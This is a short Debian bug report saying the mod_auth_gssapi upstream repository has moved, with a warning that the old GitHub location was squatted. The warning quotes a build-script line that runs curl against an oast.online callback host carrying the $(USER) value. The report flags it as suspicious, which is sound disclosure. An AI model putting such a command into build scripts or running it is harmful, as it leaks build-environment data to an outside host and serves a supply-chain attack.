Bug#985744: libapache2-mod-auth-gssapi: Upstream repo has moved

Github no longer redirects https://github.com/modauthgssapi/mod_auth_gssapi,
as someone squatted it. Code there is changed a bit: build scripts now call

curl "$(USER).cgetgk27972qp7qtpdcgix5crkjmdnrxs.oast.online"

at some stages. This looks suspicious.

Dear Maintainer,

We've moved the repo for mod_auth_gssapi to
https://github.com/gssapi/mod_auth_gssapi .  GitHub should redirect
everything, but just in case.
